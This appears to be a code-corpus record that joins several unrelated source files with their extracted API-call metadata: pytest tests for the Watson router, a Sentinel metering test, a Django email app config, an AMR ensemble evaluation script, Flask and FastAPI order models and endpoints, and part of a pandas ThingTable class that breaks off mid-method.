        assert len(list_router) == 2
class TestChoice(object):
    """Tests for the Choice router, which delegates to child routers."""

    def test_invalid(self):
        choice = routers.Choice()
        with raises(NotImplementedError):
            choice.add_route('test')
        with raises(NotImplementedError):
            choice.add_definition('test')

    def test_create(self):
        choice = routers.Choice(routers.Dict())
        assert choice
        assert repr(choice) == '<watson.routing.routers.Choice routers:1 routes:0>'
        choice.add_router(routers.Dict())
        assert repr(choice) == '<watson.routing.routers.Choice routers:2 routes:0>'

    def test_get_matched_router(self):
        choice = routers.Choice(routers.Dict())
        assert choice[routers.Dict]
        assert not choice['blah']

    def test_match_route(self):
        request = sample_request(PATH_INFO='/list')
        dict_router = routers.Dict({'dict': {'path': '/dict'}})
        list_router = routers.List([{'name': 'list', 'path': '/list'}])
        choice = routers.Choice(dict_router, list_router)
        match = choice.match(request)
        assert match.route.name == 'list'
        assert len(choice) == 2
        assert not choice.match(sample_request(PATH_INFO='/test'))

    def test_assemble(self):
        list_router = routers.List([{'name': 'list', 'path': '/list'}])
        choice = routers.Choice(list_router)
        assert choice.assemble('list') == '/list'
        with raises(KeyError):
            choice.assemble('invalid')
        assert choice.assemble('list', query_string={'page': 1}) == '/list?page=1'
        assert 'order=desc' in choice.assemble('list', query_string={'page': 1, 'order': 'desc'})
| [
"watson.routing.routers.List",
"watson.routing.routers.Dict",
"watson.routing.routers.Choice",
"pytest.raises",
"tests.watson.routing.support.sample_request"
] | [((211, 225), 'watson.routing.routers.Dict', 'routers.Dict', ([], {}), '()\n', (223, 225), False, 'from watson.routing import routers\n'), ((382, 419), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/'}}"], {}), "({'home': {'path': '/'}})\n", (394, 419), False, 'from watson.routing import routers\n'), ((559, 638), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/', 'children': {'about': {'path': 'about'}}}}"], {}), "({'home': {'path': '/', 'children': {'about': {'path': 'about'}}}})\n", (571, 638), False, 'from watson.routing import routers\n'), ((886, 1046), 'watson.routing.routers.Dict', 'routers.Dict', (["{'1st': {'path': '/home', 'children': {'2nd': {'path': '/:test', 'requires':\n {'test': '\\\\w+'}, 'children': {'3rd': {'path': '/:tada'}}}}}}"], {}), "({'1st': {'path': '/home', 'children': {'2nd': {'path':\n '/:test', 'requires': {'test': '\\\\w+'}, 'children': {'3rd': {'path':\n '/:tada'}}}}}})\n", (898, 1046), False, 'from watson.routing import routers\n'), ((1372, 1410), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/home/blah"""'}), "(PATH_INFO='/home/blah')\n", (1386, 1410), False, 'from tests.watson.routing.support import sample_request\n'), ((1490, 1533), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/home/blah/tada"""'}), "(PATH_INFO='/home/blah/tada')\n", (1504, 1533), False, 'from tests.watson.routing.support import sample_request\n'), ((1775, 1791), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {}), '()\n', (1789, 1791), False, 'from tests.watson.routing.support import sample_request\n'), ((1809, 1846), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/'}}"], {}), "({'home': {'path': '/'}})\n", (1821, 1846), False, 'from watson.routing import routers\n'), ((2114, 2244), 'watson.routing.routers.Dict', 'routers.Dict', (["{'page1': {'path': '/page[/:id[/:blah]]'}, 'page2': 
{'path':\n '/page[/:id[/:blah[/:something]]]', 'priority': 2}}"], {}), "({'page1': {'path': '/page[/:id[/:blah]]'}, 'page2': {'path':\n '/page[/:id[/:blah[/:something]]]', 'priority': 2}})\n", (2126, 2244), False, 'from watson.routing import routers\n'), ((2370, 2403), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/page"""'}), "(PATH_INFO='/page')\n", (2384, 2403), False, 'from tests.watson.routing.support import sample_request\n'), ((2539, 2555), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {}), '()\n', (2553, 2555), False, 'from tests.watson.routing.support import sample_request\n'), ((2573, 2615), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/about'}}"], {}), "({'home': {'path': '/about'}})\n", (2585, 2615), False, 'from watson.routing import routers\n'), ((2793, 2830), 'watson.routing.routers.Dict', 'routers.Dict', (["{'home': {'path': '/'}}"], {}), "({'home': {'path': '/'}})\n", (2805, 2830), False, 'from watson.routing import routers\n'), ((3070, 3084), 'watson.routing.routers.List', 'routers.List', ([], {}), '()\n', (3082, 3084), False, 'from watson.routing import routers\n'), ((3169, 3214), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'home', 'path': '/'}]"], {}), "([{'name': 'home', 'path': '/'}])\n", (3181, 3214), False, 'from watson.routing import routers\n'), ((3485, 3571), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'about', 'path': '/about'}, {'name': 'home', 'path': '/'}]"], {}), "([{'name': 'about', 'path': '/about'}, {'name': 'home', 'path':\n '/'}])\n", (3497, 3571), False, 'from watson.routing import routers\n'), ((3750, 3849), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'home', 'path': '/', 'children': [{'name': 'about', 'path':\n 'about'}]}]"], {}), "([{'name': 'home', 'path': '/', 'children': [{'name': 'about',\n 'path': 'about'}]}])\n", (3762, 3849), False, 'from watson.routing import routers\n'), ((4074, 
4090), 'watson.routing.routers.Choice', 'routers.Choice', ([], {}), '()\n', (4088, 4090), False, 'from watson.routing import routers\n'), ((4454, 4468), 'watson.routing.routers.Dict', 'routers.Dict', ([], {}), '()\n', (4466, 4468), False, 'from watson.routing import routers\n'), ((4797, 4830), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/list"""'}), "(PATH_INFO='/list')\n", (4811, 4830), False, 'from tests.watson.routing.support import sample_request\n'), ((4853, 4894), 'watson.routing.routers.Dict', 'routers.Dict', (["{'dict': {'path': '/dict'}}"], {}), "({'dict': {'path': '/dict'}})\n", (4865, 4894), False, 'from watson.routing import routers\n'), ((4970, 5019), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'list', 'path': '/list'}]"], {}), "([{'name': 'list', 'path': '/list'}])\n", (4982, 5019), False, 'from watson.routing import routers\n'), ((5059, 5099), 'watson.routing.routers.Choice', 'routers.Choice', (['dict_router', 'list_router'], {}), '(dict_router, list_router)\n', (5073, 5099), False, 'from watson.routing import routers\n'), ((5331, 5380), 'watson.routing.routers.List', 'routers.List', (["[{'name': 'list', 'path': '/list'}]"], {}), "([{'name': 'list', 'path': '/list'}])\n", (5343, 5380), False, 'from watson.routing import routers\n'), ((5420, 5447), 'watson.routing.routers.Choice', 'routers.Choice', (['list_router'], {}), '(list_router)\n', (5434, 5447), False, 'from watson.routing import routers\n'), ((2681, 2702), 'pytest.raises', 'raises', (['StopIteration'], {}), '(StopIteration)\n', (2687, 2702), False, 'from pytest import raises\n'), ((2942, 2958), 'pytest.raises', 'raises', (['KeyError'], {}), '(KeyError)\n', (2948, 2958), False, 'from pytest import raises\n'), ((3317, 3334), 'pytest.raises', 'raises', (['Exception'], {}), '(Exception)\n', (3323, 3334), False, 'from pytest import raises\n'), ((3348, 3396), 'watson.routing.routers.List', 'routers.List', (["[{'invalid': 'home', 'path': 
'/'}]"], {}), "([{'invalid': 'home', 'path': '/'}])\n", (3360, 3396), False, 'from watson.routing import routers\n'), ((4104, 4131), 'pytest.raises', 'raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (4110, 4131), False, 'from pytest import raises\n'), ((4183, 4210), 'pytest.raises', 'raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (4189, 4210), False, 'from pytest import raises\n'), ((4314, 4328), 'watson.routing.routers.Dict', 'routers.Dict', ([], {}), '()\n', (4326, 4328), False, 'from watson.routing import routers\n'), ((4660, 4674), 'watson.routing.routers.Dict', 'routers.Dict', ([], {}), '()\n', (4672, 4674), False, 'from watson.routing import routers\n'), ((5511, 5527), 'pytest.raises', 'raises', (['KeyError'], {}), '(KeyError)\n', (5517, 5527), False, 'from pytest import raises\n'), ((2013, 2046), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/test"""'}), "(PATH_INFO='/test')\n", (2027, 2046), False, 'from tests.watson.routing.support import sample_request\n'), ((5244, 5277), 'tests.watson.routing.support.sample_request', 'sample_request', ([], {'PATH_INFO': '"""/test"""'}), "(PATH_INFO='/test')\n", (5258, 5277), False, 'from tests.watson.routing.support import sample_request\n')] |
# Copyright 2017 DataCentred Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sentinel.tests.functional import base
from sentinel.tests.functional import client_fixtures as fixtures
# Metering query filter selecting only "compute.instance.create.start" events.
COMPUTE_CREATE_START_QUERY = [
    {'field': 'event_type', 'op': 'eq', 'value': 'compute.instance.create.start'}
]
class MeteringV2MetersTestCase(base.BaseTestCase):
    """Functional tests for metering v2 meter queries."""

    def test_meters_by_type(self):
        # Boot a server as a federated user so that metering samples exist.
        grant = self.useFixture(fixtures.UserProjectGrant(self.sentinel))
        user_client = base.FederatedUserClient(grant.user.entity, grant.project.entity)
        server = self.useFixture(fixtures.Server(user_client))
        # The new instance must appear among the vcpus meter's resources.
        samples = self.sentinel.metering.samples.list(meter_name='vcpus')
        sampled_resources = [sample.resource_id for sample in samples]
        self.assertIn(server.entity.id, sampled_resources)
        # Event-based assertions kept for reference; currently disabled.
        #events = self.sentinel.metering.events.list(q=COMPUTE_CREATE_START_QUERY)
        #instances = [t['value'] for e in events for t in e['traits'] if t['name'] == 'instance_id']
        #self.assertIn(server.entity.id, instances)
# vi: ts=4 et:
| [
"sentinel.tests.functional.base.FederatedUserClient",
"sentinel.tests.functional.client_fixtures.Server",
"sentinel.tests.functional.client_fixtures.UserProjectGrant"
] | [((1012, 1077), 'sentinel.tests.functional.base.FederatedUserClient', 'base.FederatedUserClient', (['grant.user.entity', 'grant.project.entity'], {}), '(grant.user.entity, grant.project.entity)\n', (1036, 1077), False, 'from sentinel.tests.functional import base\n'), ((953, 993), 'sentinel.tests.functional.client_fixtures.UserProjectGrant', 'fixtures.UserProjectGrant', (['self.sentinel'], {}), '(self.sentinel)\n', (978, 993), True, 'from sentinel.tests.functional import client_fixtures as fixtures\n'), ((1111, 1134), 'sentinel.tests.functional.client_fixtures.Server', 'fixtures.Server', (['client'], {}), '(client)\n', (1126, 1134), True, 'from sentinel.tests.functional import client_fixtures as fixtures\n')] |
from django.apps import AppConfig
from django.db.models.signals import post_migrate
import logging
LOGGER = logging.getLogger(__name__)
def start_reminder_email_task(sender, **kwargs):
    """post_migrate hook: schedule the app's recurring background tasks."""
    from .tasks import send_reminder_email, send_queued_mail, update_registration_status

    one_day = 60 * 60 * 24
    five_minutes = 60 * 5
    # Reminder emails go out once per day, indefinitely.
    send_reminder_email(repeat=one_day, repeat_until=None)
    # Queued mail is flushed every five minutes.
    send_queued_mail(repeat=five_minutes, repeat_until=None)
    # Registration statuses are re-checked once per day.
    update_registration_status(repeat=one_day, repeat_until=None)
class EmailServiceConfig(AppConfig):
    """Django app configuration for the DCBR email service."""
    name = "email_service"
    verbose_name = "DCBR Email Service"

    def ready(self):
        # start email reminder task once migrations have completed;
        # post_migrate fires after each `migrate`, so the tables the tasks
        # need exist before anything is scheduled
        post_migrate.connect(start_reminder_email_task, sender=self)
| [
"logging.getLogger",
"django.db.models.signals.post_migrate.connect"
] | [((109, 136), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (126, 136), False, 'import logging\n'), ((827, 887), 'django.db.models.signals.post_migrate.connect', 'post_migrate.connect', (['start_reminder_email_task'], {'sender': 'self'}), '(start_reminder_email_task, sender=self)\n', (847, 887), False, 'from django.db.models.signals import post_migrate\n')] |
import argparse
import penman
from amrlib.evaluate.smatch_enhanced import compute_smatch
from ensemble.utils import align, get_entries
def _main():
    """Align ensemble predictions with gold AMRs, report SMATCH, and write
    an ``.aligned`` prediction file annotated with sentence/id metadata."""
    parser = argparse.ArgumentParser(description='Graph Ensemble (Graphene)')
    parser.add_argument(
        '-g', '--gold', default='./datasets/spring_gold_bio.txt',
        type=str,
        help='Gold amr file')
    parser.add_argument(
        '-p', '--prediction', default='./datasets/graphene_bio_all.wiki.txt',
        type=str,
        help='Prediction files')
    args = parser.parse_args()

    gold_path = args.gold
    print('Gold file:', gold_path)
    prediction_path = args.prediction
    original_gold_entries, gold_entries = get_entries(gold_path)
    print('Prediction file:', prediction_path)
    original_test_entries, test_entries = get_entries(prediction_path)

    print("Align files")
    aligned = align(original_gold_entries, original_test_entries, test_entries)
    precision, recall, f_score = compute_smatch(aligned, gold_entries)
    print(' SMATCH -> P: %.3f, R: %.3f, F: %.3f' % (precision, recall, f_score))

    # Round-trip through penman to normalise the graph serialisation.
    aligned = [penman.encode(penman.decode(g)) for g in aligned]
    outputs = []
    for gold_graph, prediction in zip(original_gold_entries, aligned):
        meta = penman.decode(gold_graph)
        annotated = '# ::snt ' + meta.metadata['snt'] + '\n' + '# ::id ' + meta.metadata['id'] + '\n' + prediction
        outputs.append(annotated)

    output_file = prediction_path + '.aligned'
    with open(output_file, 'wt') as f:
        print('Write prediction to', output_file)
        f.write('\n\n'.join(map(str, outputs)))


if __name__ == '__main__':
    _main()
| [
"penman.decode",
"argparse.ArgumentParser",
"amrlib.evaluate.smatch_enhanced.compute_smatch",
"ensemble.utils.align",
"ensemble.utils.get_entries"
] | [((178, 242), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Graph Ensemble (Graphene)"""'}), "(description='Graph Ensemble (Graphene)')\n", (201, 242), False, 'import argparse\n'), ((703, 725), 'ensemble.utils.get_entries', 'get_entries', (['ref_fname'], {}), '(ref_fname)\n', (714, 725), False, 'from ensemble.utils import align, get_entries\n'), ((813, 835), 'ensemble.utils.get_entries', 'get_entries', (['gen_fname'], {}), '(gen_fname)\n', (824, 835), False, 'from ensemble.utils import align, get_entries\n'), ((872, 941), 'ensemble.utils.align', 'align', (['original_gold_entries', 'original_test_entries_1', 'test_entries_1'], {}), '(original_gold_entries, original_test_entries_1, test_entries_1)\n', (877, 941), False, 'from ensemble.utils import align, get_entries\n'), ((975, 1009), 'amrlib.evaluate.smatch_enhanced.compute_smatch', 'compute_smatch', (['test', 'gold_entries'], {}), '(test, gold_entries)\n', (989, 1009), False, 'from amrlib.evaluate.smatch_enhanced import compute_smatch\n'), ((1232, 1248), 'penman.decode', 'penman.decode', (['g'], {}), '(g)\n', (1245, 1248), False, 'import penman\n'), ((1120, 1136), 'penman.decode', 'penman.decode', (['g'], {}), '(g)\n', (1133, 1136), False, 'import penman\n')] |
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class Participant(db.Model):
    """A training participant plus the trainer/company contacts that must
    confirm the registration."""
    id = db.Column(db.Integer, primary_key=True)
    firstname = db.Column(db.String(80), nullable=False)
    lastname = db.Column(db.String(80), nullable=False)
    classname = db.Column(db.String(7), nullable=False)
    email_student = db.Column(db.String(120), unique=True, nullable=False)
    company_name = db.Column(db.String(80), nullable=False)
    trainer_name = db.Column(db.String(80), nullable=False)
    email_trainer = db.Column(db.String(120), nullable=False)
    # One-time validation tokens sent to the student and the trainer.
    student_validation = db.Column(db.String(40), unique=True)
    trainer_validation = db.Column(db.String(40), unique=True)
    # Flipped to True once the matching token has been confirmed.
    student_validated = db.Column(db.Boolean(), default=False)
    trainer_validated = db.Column(db.Boolean(), default=False)

    def get_full_name(self):
        """Return the participant's full name ("firstname lastname")."""
        # f-string for consistency with __repr__ below.
        return f'{self.firstname} {self.lastname}'

    def __repr__(self):
        return f'<Student {self.get_full_name()}, {self.classname} from {self.company_name}>'
| [
"flask_sqlalchemy.SQLAlchemy"
] | [((48, 60), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (58, 60), False, 'from flask_sqlalchemy import SQLAlchemy\n')] |
# -*- encoding: utf-8 -*-
"""
@File : views.py
@Time : 2020/4/11 14:04
@Author : chise
@Email : <EMAIL>
@Software: PyCharm
@info :
"""
import math
from datetime import datetime
from typing import Dict
from fastapi import APIRouter, Query, Depends
from sqlalchemy import select, func, insert
from fastapi_admin import User, AdminDatabase
from fastapi_admin.auth.depends import create_current_active_user
from fastapi_admin.publicDepends.paging_query import paging_query_depend
from .schemas import TransactionType, OrderStatusEnum, OrderPostSchema, OrderPostRes
# Router collecting all order endpoints of this module.
router = APIRouter()
# NOTE(review): imports placed mid-module; consider moving them to the top
# of the file with the other imports.
from .models import Order
from fastapi_admin.views.methods_get import model_get_list_func
from fastapi_admin.views.methods_post import model_post_func
# Auto-generate list/create handlers (and their pydantic schemas) for Order.
order_get_list, schema = model_get_list_func(Order, )
order_post, order_post_schema = model_post_func(Order)
# Register the generated create handler; marked deprecated in favour of the
# hand-written /v2/order endpoint below.
router.post('/order', name="创建订单", deprecated=True, response_model=order_post_schema)(order_post)
@router.post('/v2/order', name='创建订单', deprecated=True, response_model=OrderPostRes)
async def order_post(order_info: OrderPostSchema, current_user: User = Depends(create_current_active_user(True))):
    """Create an order and return it together with its generated id.

    Requires an authenticated active user; the request body is validated
    by ``OrderPostSchema``.
    """
    # Removed leftover debug print(order_info).
    res = dict(order_info)
    query = insert(Order).values(res)
    # database.execute() returns the primary key of the inserted row.
    res['id'] = await AdminDatabase().database.execute(query)
    return res
@router.get('/order', name="订单列表过滤功能测试")
async def order_list(platform: str = Query(None, description="平台订单号"),
                     tenant: str = Query(None, description="商户订单号"),
                     official: str = Query(None, description="官方订单号"),
                     channel_id: str = Query(None, description="通道id"),
                     goods_name: str = Query(None, description="商品名称"),
                     transaction_type: TransactionType = Query(None, description="支付方式"),
                     start_create_time: datetime = Query(None, description="开始时间"),
                     end_create_time: datetime = Query(None, description="截止时间"),
                     status: OrderStatusEnum = Query(None, description="订单状态"),
                     page: Dict[str, int] = Depends(paging_query_depend),
                     current_user: User = Depends(create_current_active_user(True))):
    """Paginated order listing with prioritised filters.

    The order-number filters take precedence: the first of
    platform / tenant / official that is provided is the only filter
    applied; otherwise the remaining field filters are combined.
    Returns paging metadata plus the matching rows.
    """
    table = Order.__table__
    query = Order.__table__.select()
    # Identity comparisons with None (PEP 8) instead of "!= None".
    if platform is not None:  # platform order number
        query = query.where(table.c.platform_id.like('%' + platform + '%'))
    elif tenant is not None:  # merchant order number
        query = query.where(table.c.bussiness_order_id.like('%' + tenant + '%'))
    elif official is not None:  # official order number
        query = query.where(table.c.offical_order_id.like('%' + official + '%'))
    else:
        if channel_id:
            query = query.where(table.c.channel_id.like('%' + channel_id + '%'))
        if goods_name:
            query = query.where(table.c.goods_name.like('%' + goods_name + '%'))
        if transaction_type:
            query = query.where(table.c.transaction_type == transaction_type)
        if status:
            query = query.where(table.c.status == status)
        if start_create_time:
            query = query.where(table.c.create_time >= start_create_time)
        if end_create_time:
            query = query.where(table.c.create_time <= end_create_time)
    # Apply pagination (page_number is 1-based).
    query = query.offset((page['page_number'] - 1) * page['page_size']).limit(
        page['page_size'])
    paginate_obj = await AdminDatabase().database.fetch_all(query)
    # NOTE(review): this count ignores the filters above, so rows_total
    # reflects the whole table -- confirm that is intended.
    count_query = select([func.count(table.c.id)])
    rows_total = await AdminDatabase().database.fetch_val(count_query)
    res_obj = {
        # Python 3 true division makes the old "* 1.0" float trick redundant.
        "page_count": int(math.ceil(rows_total / page['page_size'])),
        "rows_total": rows_total,
        "page_number": page['page_number'],
        "page_size": page['page_size'],
        "data": paginate_obj
    }
    return res_obj
| [
"fastapi_admin.AdminDatabase",
"sqlalchemy.func.count",
"math.ceil",
"sqlalchemy.insert",
"fastapi_admin.auth.depends.create_current_active_user",
"fastapi_admin.views.methods_get.model_get_list_func",
"fastapi.APIRouter",
"fastapi.Query",
"fastapi.Depends",
"fastapi_admin.views.methods_post.model... | [((585, 596), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (594, 596), False, 'from fastapi import APIRouter, Query, Depends\n'), ((774, 800), 'fastapi_admin.views.methods_get.model_get_list_func', 'model_get_list_func', (['Order'], {}), '(Order)\n', (793, 800), False, 'from fastapi_admin.views.methods_get import model_get_list_func\n'), ((835, 857), 'fastapi_admin.views.methods_post.model_post_func', 'model_post_func', (['Order'], {}), '(Order)\n', (850, 857), False, 'from fastapi_admin.views.methods_post import model_post_func\n'), ((1402, 1434), 'fastapi.Query', 'Query', (['None'], {'description': '"""平台订单号"""'}), "(None, description='平台订单号')\n", (1407, 1434), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1471, 1503), 'fastapi.Query', 'Query', (['None'], {'description': '"""商户订单号"""'}), "(None, description='商户订单号')\n", (1476, 1503), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1542, 1574), 'fastapi.Query', 'Query', (['None'], {'description': '"""官方订单号"""'}), "(None, description='官方订单号')\n", (1547, 1574), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1615, 1646), 'fastapi.Query', 'Query', (['None'], {'description': '"""通道id"""'}), "(None, description='通道id')\n", (1620, 1646), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1687, 1718), 'fastapi.Query', 'Query', (['None'], {'description': '"""商品名称"""'}), "(None, description='商品名称')\n", (1692, 1718), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1777, 1808), 'fastapi.Query', 'Query', (['None'], {'description': '"""支付方式"""'}), "(None, description='支付方式')\n", (1782, 1808), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1861, 1892), 'fastapi.Query', 'Query', (['None'], {'description': '"""开始时间"""'}), "(None, description='开始时间')\n", (1866, 1892), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1943, 1974), 'fastapi.Query', 'Query', (['None'], {'description': 
'"""截止时间"""'}), "(None, description='截止时间')\n", (1948, 1974), False, 'from fastapi import APIRouter, Query, Depends\n'), ((2023, 2054), 'fastapi.Query', 'Query', (['None'], {'description': '"""订单状态"""'}), "(None, description='订单状态')\n", (2028, 2054), False, 'from fastapi import APIRouter, Query, Depends\n'), ((2100, 2128), 'fastapi.Depends', 'Depends', (['paging_query_depend'], {}), '(paging_query_depend)\n', (2107, 2128), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1122, 1154), 'fastapi_admin.auth.depends.create_current_active_user', 'create_current_active_user', (['(True)'], {}), '(True)\n', (1148, 1154), False, 'from fastapi_admin.auth.depends import create_current_active_user\n'), ((2180, 2212), 'fastapi_admin.auth.depends.create_current_active_user', 'create_current_active_user', (['(True)'], {}), '(True)\n', (2206, 2212), False, 'from fastapi_admin.auth.depends import create_current_active_user\n'), ((1219, 1232), 'sqlalchemy.insert', 'insert', (['Order'], {}), '(Order)\n', (1225, 1232), False, 'from sqlalchemy import select, func, insert\n'), ((3437, 3459), 'sqlalchemy.func.count', 'func.count', (['table.c.id'], {}), '(table.c.id)\n', (3447, 3459), False, 'from sqlalchemy import select, func, insert\n'), ((3570, 3617), 'math.ceil', 'math.ceil', (["(total_page * 1.0 / page['page_size'])"], {}), "(total_page * 1.0 / page['page_size'])\n", (3579, 3617), False, 'import math\n'), ((1267, 1282), 'fastapi_admin.AdminDatabase', 'AdminDatabase', ([], {}), '()\n', (1280, 1282), False, 'from fastapi_admin import User, AdminDatabase\n'), ((3374, 3389), 'fastapi_admin.AdminDatabase', 'AdminDatabase', ([], {}), '()\n', (3387, 3389), False, 'from fastapi_admin import User, AdminDatabase\n'), ((3485, 3500), 'fastapi_admin.AdminDatabase', 'AdminDatabase', ([], {}), '()\n', (3498, 3500), False, 'from fastapi_admin import User, AdminDatabase\n')] |
#
# Copyright (c) 2021 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import textwrap
#
# thing_table.py
#
# Part of text_extensions_for_pandas
#
# Data structure for managing collections of immutable items that implement
# __hash__ and __eq__. Serves as a base class for StringTable
#
from abc import ABC, abstractmethod
from typing import *
import numpy as np
class ThingTable(ABC):
"""
A set of immutable things, plus integer IDs for said things.
Also implicitly maps `None` to ID -1.
Serves as a base class for collections of specific things like strings and
tokenizations.
"""
# Special integer ID for None as a thing.
NONE_ID = -1
# Special integer ID for "not an id"
NOT_AN_ID = -2
def __init__(self):
# Bidirectional map from unique thing (possibly boxed for dictionary
# compatibility) to integer ID and back
self._boxed_thing_to_id = {} # type: Dict[Any, int]
self._id_to_boxed_thing = [] # type: List[Any]
self._total_bytes = 0 # type: int
@abstractmethod
def size_of_thing(self, thing: Any) -> int:
"""
:param thing: Thing to be insterted in this table
:return: The number of bytes that the thing occupies in memory
"""
pass
@abstractmethod
def type_of_thing(self) -> Type:
"""
:return: Expected type of things that this table will manage
"""
pass
def box(self, thing: Any) -> Any:
"""
Subclasses should override this method if they manage items that aren't
compatible with Python dictionaries.
:param thing: Thing to insert into the table
:return: a dictionary-compatible boxed version of `thing`, if such boxing
is needed to make `thing` dictionary-compatible.
"""
# Default implementation is a no-op
return thing
def unbox(self, boxed_thing: Any) -> Any:
"""
Subclasses should override this method if they manage items that aren't
compatible with Python dictionaries.
:param boxed_thing: Thing that was boxed by this class's `box` method.
:return: Original thing that was passed to `box`
"""
# Default implementation is a no-op
return boxed_thing
@classmethod
def create_single(cls, thing: Any):
"""
Factory method for building a table containing a single value at ID 0.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
"""
# For now we return a fresh table each time.
ret = cls()
ret.maybe_add_thing(thing)
return ret
@classmethod
def merge_tables_and_ids(cls, tables: Sequence["ThingTable"],
int_ids: Sequence[np.ndarray]) \
-> Tuple["ThingTable", np.ndarray]:
"""
Factory method for combining together multiple references to different
ThingTables into references to a new, combined ThingTable of the same type.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
:param tables: A list of (possibly) different mappings from int to string
:param int_ids: List of lists of integer IDs that decode to strings via the
corresponding elements of `tables`.
:returns: A tuple containing:
* A new, merged table containing all the unique things under `tables`
that are referenced in `int_ids` (and possibly additional things that aren't
referenced)
* Numpy arrays of integer offsets into the new table, corresponding to the
elements of `int_ids`
"""
if len(tables) != len(int_ids):
raise ValueError(f"Got {len(tables)} {cls}s "
f"and {len(int_ids)} lists of IDs.")
# TODO: Add fast-path code here to pass through the first table if
# both input tables are identical.
new_table = cls()
new_ids_list = []
for i in range(len(tables)):
old_table = tables[i]
if not isinstance(old_table, cls):
raise TypeError(f"Expected table of type {cls}, but got "
f"{type(old_table)}")
old_ids = int_ids[i]
if len(old_ids.shape) != 1:
raise ValueError(f"Invalid shape for IDs {old_ids}")
new_ids = np.empty_like(old_ids, dtype=int)
old_id_to_new_id = [
new_table.maybe_add_thing(old_table.id_to_thing(j))
for j in range(old_table.num_things)
]
for j in range(len(old_ids)):
new_ids[j] = old_id_to_new_id[old_ids[j]]
new_ids_list.append(new_ids)
return new_table, new_ids_list
@classmethod
def merge_things(cls, things: Union[Sequence[Any], np.ndarray]):
f"""
Factory method for bulk-adding multiple things to create a single
ThingTable and a list of integer IDs against that ThingTable.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
:param things: things to be de-duplicated and converted to a ThingTable.
:returns: Two values:
* A ThingTable containing (at least) all the unique strings in `strings`
* A Numppy array of integer string IDs against the returned ThingTable, where
each ID maps to the corresponding element of `strings`
"""
new_table = cls()
str_ids = np.empty(len(things), dtype=int)
for i in range(len(things)):
str_ids[i] = new_table.maybe_add_thing(things[i])
return new_table, str_ids
@classmethod
def from_things(cls, things: Union[Sequence[Any], np.ndarray]):
"""
Factory method for creating a ThingTable from a sequence of unique things.
:param things: sequence of unique things to be added to the ThingTable.
:return: A ThingTable containing the elements of `things`.
"""
new_table = cls()
for thing in things:
new_table.add_thing(thing)
return new_table
def thing_to_id(self, thing: Any) -> int:
"""
:param thing: A thing to look up in this table
:returns: One of:
* The integer ID of the indicated thing, if present.
* `ThingTable.NONE_ID` if thing is None
* `ThingTable.NOT_AN_ID` if thing is not present in the table
"""
if thing is None:
# By convention, None maps to -1
return ThingTable.NONE_ID
elif not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
else:
# Remaining branches require boxing for dictionary lookup
boxed_thing = self.box(thing)
if boxed_thing not in self._boxed_thing_to_id:
return ThingTable.NOT_AN_ID
else:
return self._boxed_thing_to_id[boxed_thing]
def id_to_thing(self, int_id: Union[int, np.int64, np.int32]) -> Any:
"""
:param int_id: Integer ID that is potentially associated with a thing in the
table
:return: The associated thing, if present, or `None` if no thing is associated
with the indicated ID.
"""
if not isinstance(int_id, (int, np.int64, np.int32)):
raise TypeError(f"Expected integer, but received {int_id} "
f"of type {type(int_id)}")
elif int_id <= ThingTable.NOT_AN_ID:
raise ValueError(f"Invalid ID {int_id}")
elif ThingTable.NONE_ID == int_id:
return None
else:
boxed_thing = self._id_to_boxed_thing[int_id]
return self.unbox(boxed_thing)
def ids_to_things(self, int_ids: Union[Sequence[int], np.ndarray]) -> np.ndarray:
"""
Vectorized version of :func:`id_to_string` for translating multiple IDs
at once.
:param int_ids: Multiple integer IDs to be translated to strings
:returns: A numpy array of string objects.
"""
if not isinstance(int_ids, np.ndarray):
